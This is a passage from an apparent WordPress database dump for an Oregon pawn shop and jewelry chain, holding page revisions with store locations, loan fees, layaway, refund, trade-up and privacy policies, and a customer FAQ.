pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n ','Home','','publish','closed','open','','home','','','2015-03-22 15:08:28','2015-03-22 22:08:28','',0,'http://atgjewelry.com/fuze7/?page_id=48',0,'page','',0),(49,2,'2015-02-08 21:00:47','2015-02-08 21:00:47','<div class=\"home-content-area\">\r\n<h2>All That Glitters, Reinventing The Pawn Shop</h2>\r\nAll of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.\r\n\r\nAt All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.\r\n\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n\r\n</div>','Home','','inherit','open','open','','48-revision-v1','','','2015-02-08 21:00:47','2015-02-08 21:00:47','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(51,2,'2015-02-08 21:10:50','2015-02-08 21:10:50','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss it\'s loan value with you.</li>\r\n <li>We will explain the terms, and go over any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..its just that easy!</li>\r\n</ul>\r\n</ul>\r\n \r\n\r\n<img src=\"http://atgjewelry.com/images/lone-img.png\" alt=\"\" width=\"277\" height=\"188\" />\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended longer by paying a finance charge. Finance charge is made up of the following: (all fees based on the amount you borrow)\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, also any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n</ul>\r\n<img src=\"http://atgjewelry.com/images/lone-img1.png\" alt=\"\" width=\"184\" height=\"102\" />\r\n\r\n \r\n\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold filled jewelry.</strong>\r\n<img src=\"http://atgjewelry.com/images/lone-img2.png\" alt=\"\" width=\"279\" height=\"187\" />\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\"><strong>Guitars</strong>\r\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-08 21:10:50','2015-02-08 21:10:50','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(50,2,'2015-02-08 21:10:28','2015-02-08 21:10:28','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss it\'s loan value with you.</li>\r\n <li>We will explain the terms, and go over any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..its just that easy!</li>\r\n</ul>\r\n</ul>\r\n \r\n\r\n<img src=\"http://atgjewelry.com/images/lone-img.png\" alt=\"\" width=\"277\" height=\"188\" />\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended longer by paying a finance charge. Finance charge is made up of the following: (all fees based on the amount you borrow)\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, also any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li><del>Notification Fee: On loans of $1500.00 or more a fee of $5.00 plus postage.</del></li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n</ul>\r\n<img src=\"http://atgjewelry.com/images/lone-img1.png\" alt=\"\" width=\"184\" height=\"102\" />\r\n\r\n \r\n\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold filled jewelry.</strong>\r\n<img src=\"http://atgjewelry.com/images/lone-img2.png\" alt=\"\" width=\"279\" height=\"187\" />\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\"><strong>Guitars</strong>\r\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-08 21:10:28','2015-02-08 21:10:28','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(52,2,'2015-02-08 21:14:57','2015-02-08 21:14:57','Buying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipts, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. We just require you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us, as long as you have your original purchase receipt.','Wholesale Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-08 21:14:57','2015-02-08 21:14:57','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(53,2,'2015-02-08 21:15:54','2015-02-08 21:15:54','Buying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us, as long as you have your original purchase receipt.','Wholesale Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-08 21:15:54','2015-02-08 21:15:54','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(54,2,'2015-02-08 21:19:45','2015-02-08 21:19:45','Buying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.','Wholesale Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-08 21:19:45','2015-02-08 21:19:45','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(55,2,'2015-02-08 21:26:35','2015-02-08 21:26:35','<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of any item within the 90 day layaway period, you can request an in store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\nStone Replacement Guarantee\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6 month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\nRefund Policy\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7 day money back guarantee in the same form of payment made.</li>\r\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\r\n <li>After 7 days (up to 30) you will receive in store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30 day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\nTrade-Up Policy\r\n<ul class=\"listing-check\">\r\n <li>All That Glitters offers a wonderful trade up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.</li>\r\n <li>Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.</li>\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n <li>Please note trade up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\r\n</ul>\r\nPrivacy Policy\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must be in person and you must present valid ID for us to look up your account.</p>\r\nWe restrict access to non-public personal information about you to those employees who need to know that information to provide products or services to you and maintain safeguards that restrict access to your non-public personal information.\r\n\r\nPolicy Changes and Questions\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>','Guidelines/Policies','','inherit','open','open','','45-revision-v1','','','2015-02-08 21:26:35','2015-02-08 21:26:35','',45,'http://atgjewelry.com/fuze7/45-revision-v1/',0,'revision','',0),(56,2,'2015-02-08 21:29:36','2015-02-08 21:29:36','You can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-02-08 21:29:36','2015-02-08 21:29:36','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(57,2,'2015-02-10 20:56:13','2015-02-10 20:56:13','[woocommerce_checkout]','Checkout','','inherit','open','open','','8-revision-v1','','','2015-02-10 20:56:13','2015-02-10 20:56:13','',8,'http://atgjewelry.com/fuze7/8-revision-v1/',0,'revision','',0),(58,2,'2015-02-10 20:56:22','2015-02-10 20:56:22','[woocommerce_cart]','Cart','','inherit','open','open','','7-revision-v1','','','2015-02-10 20:56:22','2015-02-10 20:56:22','',7,'http://atgjewelry.com/fuze7/7-revision-v1/',0,'revision','',0),(59,2,'2015-02-10 20:56:35','2015-02-10 20:56:35','[woocommerce_my_account]','My Account','','inherit','open','open','','9-revision-v1','','','2015-02-10 20:56:35','2015-02-10 20:56:35','',9,'http://atgjewelry.com/fuze7/9-revision-v1/',0,'revision','',0),(108,2,'2015-02-15 15:52:13','2015-02-15 23:52:13','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n \r\n\r\n<img src=\"http://atgjewelry.com/images/lone-img.png\" alt=\"\" width=\"277\" height=\"188\" />\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<img src=\"http://atgjewelry.com/images/lone-img1.png\" alt=\"\" width=\"184\" height=\"102\" />\r\n\r\n[/one_half]\r\n[one_half]\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold-filled jewelry.</strong>\r\n<img src=\"http://atgjewelry.com/images/lone-img2.png\" alt=\"\" width=\"279\" height=\"187\" />\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\"><strong>Guitars</strong>\r\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-15 15:52:13','2015-02-15 23:52:13','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(106,2,'2015-02-15 15:40:50','2015-02-15 23:40:50','<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in-store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in-store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of an item within the 90-day layaway period, you can request an in-store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\nStone Replacement Guarantee\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6-month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\nRefund Policy\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7-day money back guarantee in the same form of payment made.</li>\r\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\r\n <li>After 7 days (up to 30) you will receive in-store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30-day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade-in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\nTrade-Up Policy\r\n\r\nAll That Glitters offers a wonderful trade-up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.\r\n<ul class=\"listing-check\">\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n <li>Please note trade-up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\r\n</ul>\r\nPrivacy Policy\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must appear in person and present valid ID for us to look up your account information.</p>\r\nWe restrict access to non-public personal information about you to those employees who need that information to provide products or services to you, and maintain safeguards that restrict access to your non-public personal information.\r\n\r\nPolicy Changes and Questions\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>','Guidelines/Policies','','inherit','open','open','','45-revision-v1','','','2015-02-15 15:40:50','2015-02-15 23:40:50','',45,'http://atgjewelry.com/fuze7/45-revision-v1/',0,'revision','',0),(113,2,'2015-02-23 18:12:26','2015-02-24 02:12:26','All That Glitters is a family-owned and operated business serving Oregon\'s Pacific Northwest for more than 25 years. We are a member of the National Pawnbroker\'s Association, and active members of the Oregon Pawnbrokers Association.\r\n\r\nOur goal is to ensure that every customer is treated in the friendliest and fairest way possible. We do this by offering lifetime stone replacement policies and an excellent trade up policy on all of our jewelry. We offer wholesale prices every day with discounts starting at 50% off of Retail Prices on nearly all the jewelry we sell. All other merchandise is researched and priced with you in mind. We want to sell it, we don\'t want to keep it!\r\n\r\nAll That Glitters is an established, licensed, bonded and insured business with a reputation to maintain. Our goal is to change the way you view Pawnshops by providing you with as close to a retail experience as we can, while keeping our prices at wholesale level or below.','About Company','','inherit','open','open','','31-revision-v1','','','2015-02-23 18:12:26','2015-02-24 02:12:26','',31,'http://atgjewelry.com/fuze7/31-revision-v1/',0,'revision','',0),(60,2,'2015-02-10 21:04:35','2015-02-10 21:04:35',' ','','','publish','open','open','','60','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',0,'http://atgjewelry.com/fuze7/?p=60',3,'nav_menu_item','',0),(61,2,'2015-02-10 21:04:35','2015-02-10 21:04:35','','Gold','','publish','open','open','','61','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',0,'http://atgjewelry.com/fuze7/?p=61',2,'nav_menu_item','',0),(62,2,'2015-02-10 21:04:35','2015-02-10 21:04:35','','Guidelines','','publish','open','open','','62','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',31,'http://atgjewelry.com/fuze7/?p=62',11,'nav_menu_item','',0),(63,2,'2015-02-10 21:04:35','2015-02-10 21:04:35',' ','','','publish','open','open','','63','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',0,'http://atgjewelry.com/fuze7/?p=63',4,'nav_menu_item','',0),(64,2,'2015-02-10 21:04:35','2015-02-10 21:04:35',' ','','','publish','open','open','','64','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',0,'http://atgjewelry.com/fuze7/?p=64',1,'nav_menu_item','',0),(66,2,'2015-02-10 21:04:35','2015-02-10 21:04:35',' ','','','publish','open','open','','66','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',0,'http://atgjewelry.com/fuze7/?p=66',9,'nav_menu_item','',0),(67,2,'2015-02-10 21:04:35','2015-02-10 21:04:35','','About','','publish','open','open','','67','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',0,'http://atgjewelry.com/fuze7/?p=67',6,'nav_menu_item','',0),(68,2,'2015-02-10 21:04:35','2015-02-10 21:04:35',' ','','','publish','open','open','','68','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',31,'http://atgjewelry.com/fuze7/?p=68',10,'nav_menu_item','',0),(120,2,'2015-02-23 19:07:54','2015-02-24 03:07:54','[row_fluid]\r\n[one_half]\r\n<h3>Layaway Policy</h3>\r\nA pawn is a collateral loan. A pawnbroker is one who lends money while holding an item of value as collateral.\r\n<h3>What if I don\'t want to Pawn my item? Will you buy outright?</h3>\r\nWe will purchase any item we would loan on. Usually, for the same amount.\r\n<h3>What do I need to get a loan?</h3>\r\nA state issued drivers license or ID card from any state is required. If you have an out of state ID card, you must present a second piece of ID. By law, we can not take anything from you without ID. *You must be 18 years of age or older to take out a loan.\r\n<h3>Is my transaction confidential?</h3>\r\nAbsolutely, we respect your privacy. All transaction & personal information collected is confidential. See our \"Privacy Policy\".\r\n<h3>Am I guaranteed to get my item back when I repay the loan?</h3>\r\nAbsolutely! As long as you return while the loan is active your property is safely stored. Your pledge will be sold ONLY if you do not return for it within your loan period.\r\n<h3>My loan slip says Bearer Contract, what does that mean?</h3>\r\nIn the state of Oregon, pawn slips are \"Bearer Contracts\". This means that whomever is in possession of your pink slip is considered the owner of your items. We recommend you keep it in a safe.\r\n<h3>Can I get more money later?</h3>\r\nOnce a pawn loan is written, we can not change the amount. If we are able to loan a higher amount you can redeem your item, we may write a new loan for the higher amount.\r\n<h3>I lost my ticket....what now?</h3>\r\nBring in the Identification used to take out your loan (Driver\'s license or ID) & you may redeem your item. There is a $3.00 fee for lost contracts.\r\n<h3>What happens if I don\'t come back for my item?</h3>\r\nIf you don\'t repay the loan, after 90 days (60 days if renewed) the pawned item(s) becomes the property of ATG.\r\n<h3>Can I get my items if it\'s past the due date?</h3>\r\nRest assured, we want everyone to have their property. If the item(s) is still on premises when you arrive, you can buy it back from us. If the item(s) have left the premises, unfortunately, at that point they are unable to be reclaimed.\r\n[/one_half]\r\n[one_half]\r\n<h3>Do you offer Layaway?</h3>\r\nWe are pleased to offer \"Interest-Free Layaways\". With just 20% down you can put any item in the store on Layaway for up to 90 days.\r\n<h3>Why buy from us?</h3>\r\nATG is an established, licensed, bonded & insured business with a reputation to maintain. Our industry is closely regulated & monitored. Every single item that passes through our store is not only examined for function & serviceability, it also has its model & serial numbers reported to our local police departments to check against the police databases. This should reassure you. After all, what other store can 